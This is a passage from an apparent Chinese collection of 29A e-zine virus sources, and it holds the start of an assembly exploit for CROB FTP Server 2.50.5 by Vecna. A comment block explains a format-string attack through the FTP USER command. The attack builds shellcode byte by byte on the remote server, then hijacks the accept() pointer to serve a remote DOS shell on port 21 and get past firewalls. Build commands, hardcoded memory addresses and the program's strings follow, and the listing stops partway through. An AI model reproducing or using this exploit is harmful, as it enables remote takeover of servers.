29a-7.014

从29A上收集的病毒源码

;CROB FTP SERVER 2.50.5 BUILD 238 EXPLOIT
;(c) Vecna 2003 - http://coderz.net/vecna - http://29a.host.sk
;
;f3ar the 7 dd exploitz!
;(you can loose 15 punds in 7 days!! ask me how!)
;
;This is my first exploit using format strings, and its for w9x(well, i tested
;it only in w98, but probably work in w95 too). The printf() implementation in
;use was not so flexible as the unix ones, or even the w2k one. so, i had to
;resort to some 'ugly' things to make it work.
;
;The first step in the exploit was build the shellcode in the remote server,
;using the format string exploit that existed in the USER command (USER %x%x).
;I did this connecting, sending a bugged USER string, that writed a byte of my
;shellcode, and disconnecting: once for each byte of our shellcode. By the
;limitations of the printf() implementation, we had to write one byte for USER
;string(except in very rare cases). More, i can only send 2 bugged USER strings
;for connection before the server started to act weird. So i resolved write one
;byte for connection. Our shellcode have, in two places, unused areas, that are
;in places where the address would contain zeros. When generating the format
;string, we take care of cases where the address have the '%' byte.
;
;The second step was choose someting to overwrite. I did this using a single
;bugged USER line, becoz the very special address i choose for the shellcode:
;10080601h. As we have to write 01h, 06h, 08h and then 10h, to form the address,
;the increasing way its bytes have allowed us write it with a single line(the
;printf() implementation limit the size of string to few more than 500).
;
;The overwrited address is a pointer to accept(). This allow to bypass any kind
;of firewall that maybe is installed in the server machine, as all the socket
;setup is done by the vulnerable server, and it surely have access to port 21,
;thats where we listen for remote DOS shells. :)
;
;When a connection its received, we restore the overwrited pointer, call the
;original accept(), create a new thread, to create the DOS shell, and return
;error to the server. This new thread create the pipes, get the command
;interpretert name in the environment, and spawn a shell, redirecting output
;and input to the socket we create first. Its done. The server will continue
;to work after exploited, and the first one to connect to port 21 after the
;exploit will gain a useful w9x remote shell :P
;
;greetz to Luca Ercoli, that found the bug.
;
;compile with:
;tasm32 /m /ml crobftp.asm
;tlink32 crobftp.obj,,,import32
;
;the includes, before you ask, are the ones from z0mbie, jacky qwerty, and
;others you should obtain in 29A e-zines, or figure out what they contain.



.586p
.model flat
locals

REMOTE_BASE EQU 10080600h               ;here we write our code...
ACCEPT_ADDR EQU 5F4D2090h               ;here we write our start address...
NULL_ADDR   EQU 10080538h               ;and there we write garbage
API_ADDR    EQU 1008050Ch               ;here we put our API addresses

@CREATEPROCESS EQU 1008050Ch
@CREATEPIPE    EQU 10080510h
@GETENVVAR     EQU 10080514h
@PEEKNAMEDPIPE EQU 10080518h
@READFILE      EQU 1008051Ch
@WRITEFILE     EQU 10080520h
@CREATETHREAD  EQU 10080524h
@SELECT        EQU 10080528h
@RECV          EQU 1008052Ch
@SEND          EQU 10080530h
@ACCEPT        EQU 10080534h

__WSOCK32          EQU 00503A2Ch
__KERNEL32         EQU 0059AF6Ch
__GetProcAddress   EQU 0059AF5Ch
__GetModuleHandleA EQU 0059AF60h

apicall macro addy
       db 0ffh,015h
       dd addy
endm



.xlist
include header.inc
include socket.inc
include consts.inc
.list


.data

copyright db "CROB FTP SERVER 2.50.5 BUILD 238 EXPLOIT",13,10
          db "(c) Vecna 2003 - http://coderz.net/vecna - http://29a.host.sk",13,10,0
completed db "Done! A DOS prompt should be waiting for you in port 21...",13,10,13,10,0
usage     db "USAGE: CROBFTP.EXE <server>",13,10,0

msg1      db "